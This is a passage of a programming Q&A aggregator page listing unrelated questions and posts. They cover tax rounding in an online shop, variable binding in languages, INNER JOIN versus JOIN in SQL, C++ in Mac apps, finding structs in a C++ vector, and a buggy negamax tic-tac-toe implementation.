need to decide whether it's worth us doing one of the following, or something completely different. Please advise with any experience or information I can read. Change all products on the site to use 2dp Keep 4dp but round each line in the order to 2dp before working out tax Keep it as it is and "fudge" the values at the export script (i.e. make that values correct by adding or subtracting 1p and changing the shipping cost to make the totals still work out) Any thoughts?

    Read the article

  • Why binding is not a native feature in most of the languages?

    - by Gulshan
    IMHO binding a variable to another variable or an expression is a very common scenario in mathematics. In fact, in the beginning, many students think the assignment operator(=) is some kind of binding. But in most of the languages, binding is not supported as a native feature. In some languages like C#, binding is supported in some cases with some conditions fulfilled. But IMHO implementing this as a native feature was as simple as changing the following code- int a,b,sum; sum := a + b; a = 10; b = 20; a++; to this- int a,b,sum; a = 10; sum = a + b; b = 20; sum = a + b; a++; sum = a + b; Meaning placing the binding instruction as assignments after every instruction changing values of any of the variable contained in the expression at right side. After this, trimming redundant instructions (or optimization in assembly after compilation) will do. So, why it is not supported natively in most of the languages. Specially in the C-family of languages? Update: From different opinions, I think I should define this proposed "binding" more precisely- This is one way binding. Only sum is bound to a+b, not the vice versa. The scope of the binding is local. Once the binding is established, it cannot be changed. Meaning, once sum is bound to a+b, sum will always be a+b. Hope the idea is clearer now. Update 2: I just wanted this P# feature. Hope it will be there in future.

    Read the article

  • SQL – Difference Between INNER JOIN and JOIN

    - by Pinal Dave
    Here is the follow up question to my earlier question SQL – Difference between != and Operator <> used for NOT EQUAL TO Operation. There was a pretty good discussion about this subject earlier and lots of people participated with their opinion. Though the answer was very simple but the conversation was indeed delightful and was indeed very informative. In this blog post I have another following up question to all of you. What is the difference between INNER JOIN and JOIN? If you are working with database you will find developers use above both the kinds of the joins in their SQL Queries. Here is the quick example of the same. Query using INNER JOIN SELECT * FROM Table1 INNER JOIN  Table2 ON Table1.Col1 = Table2.Col1 Query using JOIN SELECT * FROM Table1 JOIN  Table2 ON Table1.Col1 = Table2.Col1 The question is what is the difference between above two syntax. Here is the answer – They are equal to each other. There is absolutely no difference between them. They are equal in performance as well as implementation. JOIN is actually shorter version of INNER JOIN. Personally I prefer to write INNER JOIN because it is much cleaner to read and it avoids any confusion if there is related to JOIN. For example if users had written INNER JOIN instead of JOIN there would have been no confusion in mind and hence there was no need to have original question. Here is the question back to you - Which one of the following syntax do you use when you are inner joining two tables – INNER JOIN or JOIN? and Why? Reference: Pinal Dave (http://blog.sqlauthority.com) Filed under: PostADay, SQL, SQL Authority, SQL Joins, SQL Query, SQL Server, SQL Tips and Tricks, T SQL, Technology

    Read the article

  • Is there ever a reason to use C++ in a Mac-only application?

    - by Emil Eriksson
    Is there ever a reason to use C++ in a Mac-only application? I not talking about integrating external libraries which are C++, what I mean is using C++ because of any advantages in a particular application. While the UI code must be written in Obj-C, what about logic code? Because of the dynamic nature of Objective-C, C++ method calls tend to be ever so slightly faster but does this have any effect in any imaginable real life scenario? For example, would it make sense to use C++ over Objective-C for simulating large particle systems where some methods would need to be called over and over in short time? I can also see some cases where C++ has a more appropriate "feel". For example when doing graphics, it's nice to have vector and matrix types with appropriate operator overloads and methods. This, to me, seems like it would be a bit clunkier to implement in Objective-C. Also, Objective-C objects can never be treated plain old data structures in the same manner as C++ types since Objective-C objects always have an isa-pointer. Wouldn't it make sense to use C++ instead in something like this? Does anyone have a real life example of a situation where C++ was chosen for some parts of an application? Does Apple use any C++ except for the kernel? (I don't want to start a flame war here, both languages have their merits and I use both equally though in different applications.)

    Read the article

  • How Do I Search For Struct Items In A Vector? [migrated]

    - by Vladimir Marenus
    I'm attempting to create an inventory system using a vector implementation, but I seem to be having some troubles. I'm running into issues using a struct I made. NOTE: This isn't actually in a game code, this is a separate Solution I am using to test my knowledge of vectors and structs! struct aItem { string itemName; int damage; }; int main() { aItem healingPotion; healingPotion.itemName = "Healing Potion"; healingPotion.damage= 6; aItem fireballPotion; fireballPotion.itemName = "Potion of Fiery Balls"; fireballPotion.damage = -2; vector<aItem> inventory; inventory.push_back(healingPotion); inventory.push_back(healingPotion); inventory.push_back(healingPotion); inventory.push_back(fireballPotion); if(find(inventory.begin(), inventory.end(), fireballPotion) != inventory.end()) { cout << "Found"; } system("PAUSE"); return 0; } The preceeding code gives me the following error: 1c:\program files (x86)\microsoft visual studio 11.0\vc\include\xutility(3186): error C2678: binary '==' : no operator found which takes a left-hand operand of type 'aItem' (or there is no acceptable conversion) There is more to the error, if you need it please let me know. I bet it's something small and silly, but I've been thumping at it for over two hours. Thanks in advance!

    Read the article

  • The Other "C" in CRM

    - by [email protected]
    By Brian Dayton on April 5, 2010 7:04 PM Folks who know me know that I rarely, if ever, talk politics. And I never talk politicians. Having grown up in a household with one parent leaning left and the other leaning to the right it was the best way to keep the peace. This isn't about politics. It's about "constituents" and the need to improve the services and service levels for people--at the city, county, state/province, etc. level all the way up to national governments. As a citizen and tax payer it's also important to me that these services be provided at a reasonable cost. If there's a better and more efficient way to do something then it's my hope that a public sector organization takes advantage of technology the same way private sector companies do. Social services organizations have a complex job. They provide the services that people need, from healthcare and children's assistance to helping people find jobs. But many of these organizations are still managing these processes manually or outdated, home-grown applications that could have been written up to 30 years ago. A lot has changed in technology. On the (this is as political as I'm going to get) political front, stakeholders like you and me are expecting greater transparency on where and how funds are spent. I'll admit that most of the time, when I think about CRM systems, I think about my experience as a customer of my bank, utilities company or cable operator. But now that I'm older, have children and a house--I find myself interacting more and more with agencies and services organizations. My experiences are sometimes good and sometimes not so good. Along those lines, last week's announcement of Siebel CRM 8.2 for Public Sector caught my eye. You may not work in the public sector, but you are a constituent of some--actually a lot--of public sector organizations. I don't know which CRM systems city and county utilize but I'm going to start paying closer attention.

    Read the article

  • Is it bad idea to use flag variable to search MAX element in array?

    - by Boris Treukhov
    Over my programming career I formed a habit to introduce a flag variable that indicates that the first comparison has occured, just like Msft does in its linq Max() extension method implementation public static int Max(this IEnumerable<int> source) { if (source == null) { throw Error.ArgumentNull("source"); } int num = 0; bool flag = false; foreach (int num2 in source) { if (flag) { if (num2 > num) { num = num2; } } else { num = num2; flag = true; } } if (!flag) { throw Error.NoElements(); } return num; } However I have met some heretics lately, who implement this by just starting with the first element and assigning it to result, and oh no - it turned out that STL and Java authors have preferred the latter method. Java: public static <T extends Object & Comparable<? super T>> T max(Collection<? extends T> coll) { Iterator<? extends T> i = coll.iterator(); T candidate = i.next(); while (i.hasNext()) { T next = i.next(); if (next.compareTo(candidate) > 0) candidate = next; } return candidate; } STL: template<class _FwdIt> inline _FwdIt _Max_element(_FwdIt _First, _FwdIt _Last) { // find largest element, using operator< _FwdIt _Found = _First; if (_First != _Last) for (; ++_First != _Last; ) if (_DEBUG_LT(*_Found, *_First)) _Found = _First; return (_Found); } Are there any preferences between one method or another? Are there any historical reasons for this? Is one method more dangerous than another?

    Read the article

  • Windows Phone 7 Series &ndash; First Developer Information

    - by Nikita Polyakov
    The official developer story for Windows Phone 7 Series was finally announced at MIX10. You can review the recording of the Keynote at http://live.visitmix.com, also all the sessions will be available within 24hours of their posting. There is extensive list of presentations for Windows Phone listed here. You can start playing with these tools today! Official Silverlight site for Mobile Development: http://silverlight.net/getstarted/devices/windows-phone/  Channel 9 has a training information here: http://channel9.msdn.com/posts/Learn/Windows-Phone-7-Series-Training/ Ok, and for the ones in the hurry, direct link: Windows Phone Developer Tools CTP                      Here is the overview summary of the announcements: End-to-End Mobile Development Platform: By combining Silverlight for rich internet applications and the XNA Framework for game development, developers and designers will be able to build visually stunning and immersive applications and games on the Windows Phone 7 Series. Free Windows Phone Developer Tools: Microsoft has released a free comprehensive tool support package for Silverlight on Windows Phone 7 Series, available for download. Expression Blend for Windows Phone and a preview of Microsoft Visual Studio 2010 Express for Windows Phone will be also included as part of the download. Windows Phone Marketplace: Microsoft made available a new merchandising tool that will enable developers and designers to bring applications and games to market and increase the discoverability of applications with customers while supporting one-time credit card purchases, mobile operator billing and advertising-funded applications.

    Read the article

  • Computer Bugs - Etymology and Entomology

    - by PointsToShare
    Whatever bugs you My wife and I used to take some of our summer vacation I a cabin on the shore of Lake Atsion in NJ. I t is a delightful place in the Wharton forest with Brown yet fresh water, where we would canoe, swim and enjoy true rest. Alas, in the last few years, yellow flies also discovered the area’s pastoral delights and came in hoards to bug us. So much so that we had to give up. As a computer programmer I abhor bugs. The bugs that bug me – except the pesky yellow flies – are program bugs , a specific variety of computer bugs. You can find an excellent take on the etymology of the word ‘bug” in this delightful monogram: http://www.jamesshuggins.com/h/tek1/first_computer_bug.htm In my youth, I worked on Burroughs computers. Unlike their IBM brethren, the Burroughs used a 96 column card. The cards were much smaller than the 80 column IBM cards. We wrote our programs on coding sheets and then a key-punch operator transcribed them into punched cards. These were fed into a card reader and compiled. The compiler would notify us of compiler errors or bugs, but it was not always easy to get the meaning of the message. My friend Mark Wildt, also a Burroughs veteran, gave me an old punched card from one of his programs. Obviously a bug!! Here It Is!! That’s All Folks!

    Read the article

  • My Big Break - this is my story and I am sticking to it ;)

    - by dbasnett
    The value of undertaking new and difficult tasks can have many wonderful consequences, don't you agree? Here is the story of my big break. Remember yours? During the mid 70's I was in the Navy and worked as a computer operator at the CNO's Command and Control computer system (WWMCCS) in the Washington Navy Yard. I was a tape ape, but knew that I wanted to be a systems programmer. One day the Lieutenant in charge of the OS group was running a test that required the development system to be re-booted, and I was politely hinting that I wanted out of computer operations. As he watched the accounting tape rewind to BOT and then search for where it had just been (severalminutes) he told me if I would fix "that" he would have me transferred. I couldn't say "Deal" fast enough. Up until then my programming experience had been on Edsger Dijkstra's favorite computer (sic), an IBM 1620. It took almost 6 months of learning the assembler for the Honeywell 6000 and finding the code responsible for rewinding the tape and then forwarding it. After much trial and error at o’dark thirty I succeeded. The tape barely moved and my “patch” was later adopted by many other sites. Lieutenant Jack Cowan kept his promise and I have gone on to have a varied and enjoyable career. To Jack, and the rest of the crew (Ken, Stu, Neil, Tom, Silent W, Mr. Jacobs, Roy, Rocco, etc.) I’d like to thank you all.

    Read the article

  • Restrict Tile Map to its boundaries

    - by Farooq Arshed
    I have loaded a tmx file in cocos2dx and now I am trying to implement panning. I have successfully implemented the panning first part where the map moves. Now I want to restrict the map so it does not display the map beyond its boundary where it shows black screen. I am confused as to how to implement it. Below is my code any help would be appreciated. bool HelloWorld::init() { if ( !CCLayer::init() ) { return false; } const char* tmx= "isometric_grass_and_water.tmx"; _tileMap = new CCTMXTiledMap(); _tileMap->initWithTMXFile(tmx); this->addChild(_tileMap); this->setTouchEnabled(true); return true; } void HelloWorld::ccTouchesBegan(CCSet *touches, CCEvent *event){ CCSetIterator it; for (it=touches->begin(); it!=touches->end(); ++it){ CCTouch* touch = (CCTouch*)it.operator*(); CCLog("touches id: %d", touch->getID()); oldLoc = touch->getLocationInView(); oldLoc = CCDirector::sharedDirector()->convertToGL(oldLoc); } } void HelloWorld::ccTouchesMoved(CCSet *touches, CCEvent *event) { if (touches->count() == 1) { CCTouch* touch = (CCTouch*)( touches->anyObject() ); this->moveScreen(touch); } else if (touches->count() == 2) { this->scaleScreen(touches); } } void HelloWorld::moveScreen(CCTouch* touch) { CCPoint currentLoc = touch->getLocationInView(); currentLoc = CCDirector::sharedDirector()->convertToGL(currentLoc); CCPoint moveTo = ccpSub(oldLoc, currentLoc); moveTo = ccpMult(moveTo, -1); oldLoc = currentLoc; this->setPosition(ccpAdd(this->getPosition(), ccp(moveTo.x, moveTo.y))); }

    Read the article

  • Is '@' Error Suppression a Valid Technique for Testing for an Optional Array Key?

    - by MikeSchinkel
    Rarst and I were debating offline about the use of the '@' error suppression operator in PHP, specifically for use to test for existence of "optional" array keys, i.e. array keys that are being used as a switch here a their lack of existence in the array is functionally equivalent to the array having the key with a value equaling false. Here is pseudo-code for this scenario: function do_something( $args = array() ) { if ( @$args['switch'] ) { // Do something with this switch } // continue on... } vs. this approach: function do_something( $args = array() ) { if ( ! empty( $args['switch'] ) && $args['switch'] ) { // Do something with this switch } // continue on... } Of course in most use-cases, suppressing errors would not be A Good Thing(tm). However in this use-case where an array is passed with an optional element, it seems to me that it is actually a very good technique but I could be wrong and would like to hear other's opinions on the subject before I make up my mind. I do know that there are alleged performance hits for using the former approach but I'd like to know how they compare with the alternative and if they performance hits really matter in real world scenarios? P.S. I decided to post this because, after debating this offline with Rarst, he asked a more general question here on Programmers but didn't actually give a detailed example of the specific use-case we were debating. And since I'm pretty sure he'll want to use the out-of-context answers on that other question as justification for why the above is "bad" I decided I needed to get opinions on this specific use-case.

    Read the article

  • Component-wise GLSL vector branching

    - by Gustavo Maciel
    I'm aware that it usually is a BAD idea to operate separately on GLSL vec's components separately. For example: //use instrinsic functions, they do the calculation on 4 components at a time. float dot = v1.x*v2.x + v1.y * v2.y + v1.z * v2.z; //NEVER float dot = dot(v1, v2); //YES //Multiply one by one is not good too, since the ALU can do the 4 components at a time too. vec3 mul = vec3(v1.x * v2.x, v1.y * v2.y, v1.z * v2.z); //NEVER vec3 mul = v1 * v2; I've been struggling thinking, are there equivalent operations for branching? For example: vec4 Overlay(vec4 v1, vec4 v2, vec4 opacity) { bvec4 less = lessThan(v1, vec4(0.5)); vec4 blend; for(int i = 0; i < 4; ++i) { if(less[i]) blend[i] = 2.0 * v1[i]*v2[i]; else blend[i] = 1.0 - 2.0 * (1.0 - v1[i])*(1.0 - v2[i]); } return v1 + (blend-v1)*opacity; } This is a Overlay operator that works component wise. I'm not sure if this is the best way to do it, since I'm afraid these for and if can be a bottleneck later. Tl;dr, Can I branch component wise? If yes, how can I optimize that Overlay function with it?

    Read the article

  • Negamax implementation doesn't appear to work with tic-tac-toe

    - by George Jiglau
    I've implemented Negamax as it can be found on wikipedia, which includes alpha/beta pruning. However, it seems to favor a losing move, which should be an invalid result. The game is Tic-Tac-Toe, I've abstracted most of the game play so it should be rather easy to spot an error within the algorithm. Here is the code, nextMove, negamax or evaluate are probably the functions that contain the fault: #include <list> #include <climits> #include <iostream> //#define DEBUG 1 using namespace std; struct Move { int row, col; Move(int row, int col) : row(row), col(col) { } Move(const Move& m) { row = m.row; col = m.col; } }; struct Board { char player; char opponent; char board[3][3]; Board() { } void read(istream& stream) { stream >> player; opponent = player == 'X' ? 'O' : 'X'; for(int row = 0; row < 3; row++) { for(int col = 0; col < 3; col++) { char playa; stream >> playa; board[row][col] = playa == '_' ? 0 : playa == player ? 1 : -1; } } } void print(ostream& stream) { for(int row = 0; row < 3; row++) { for(int col = 0; col < 3; col++) { switch(board[row][col]) { case -1: stream << opponent; break; case 0: stream << '_'; break; case 1: stream << player; break; } } stream << endl; } } void do_move(const Move& move, int player) { board[move.row][move.col] = player; } void undo_move(const Move& move) { board[move.row][move.col] = 0; } bool isWon() { if (board[0][0] != 0) { if (board[0][0] == board[0][1] && board[0][1] == board[0][2]) return true; if (board[0][0] == board[1][0] && board[1][0] == board[2][0]) return true; } if (board[2][2] != 0) { if (board[2][0] == board[2][1] && board[2][1] == board[2][2]) return true; if (board[0][2] == board[1][2] && board[1][2] == board[2][2]) return true; } if (board[1][1] != 0) { if (board[0][1] == board[1][1] && board[1][1] == board[2][1]) return true; if (board[1][0] == board[1][1] && board[1][1] == board[1][2]) return true; if (board[0][0] == board[1][1] && board[1][1] == board[2][2]) return true; if (board[0][2] == board [1][1] && board[1][1] == board[2][0]) return true; } return false; } list<Move> getMoves() { list<Move> moveList; for(int row = 0; row < 3; row++) for(int col = 0; col < 3; col++) if (board[row][col] == 0) moveList.push_back(Move(row, col)); return moveList; } }; ostream& operator<< (ostream& stream, Board& board) { board.print(stream); return stream; } istream& operator>> (istream& stream, Board& board) { board.read(stream); return stream; } int evaluate(Board& board) { int score = board.isWon() ? 100 : 0; for(int row = 0; row < 3; row++) for(int col = 0; col < 3; col++) if (board.board[row][col] == 0) score += 1; return score; } int negamax(Board& board, int depth, int player, int alpha, int beta) { if (board.isWon() || depth <= 0) { #if DEBUG > 1 cout << "Found winner board at depth " << depth << endl; cout << board << endl; #endif return player * evaluate(board); } list<Move> allMoves = board.getMoves(); if (allMoves.size() == 0) return player * evaluate(board); for(list<Move>::iterator it = allMoves.begin(); it != allMoves.end(); it++) { board.do_move(*it, -player); int val = -negamax(board, depth - 1, -player, -beta, -alpha); board.undo_move(*it); if (val >= beta) return val; if (val > alpha) alpha = val; } return alpha; } void nextMove(Board& board) { list<Move> allMoves = board.getMoves(); Move* bestMove = NULL; int bestScore = INT_MIN; for(list<Move>::iterator it = allMoves.begin(); it != allMoves.end(); it++) { board.do_move(*it, 1); int score = -negamax(board, 100, 1, INT_MIN + 1, INT_MAX); board.undo_move(*it); #if DEBUG cout << it->row << ' ' << it->col << " = " << score << endl; #endif if (score > bestScore) { bestMove = &*it; bestScore = score; } } if (!bestMove) return; cout << bestMove->row << ' ' << bestMove->col << endl; #if DEBUG board.do_move(*bestMove, 1); cout << board; #endif } int main() { Board board; cin >> board; #if DEBUG cout << "Starting board:" << endl; cout << board; #endif nextMove(board); return 0; } Giving this input: O X__ ___ ___ The algorithm chooses to place a piece at 0, 1, causing a guaranteed loss, do to this trap(nothing can be done to win or end in a draw): XO_ X__ ___ Perhaps it has something to do with the evaluation function? If so, how could I fix it?

    Read the article

< Previous Page | 202 203 204 205 206 207 208 209 210 211 212 213  | Next Page >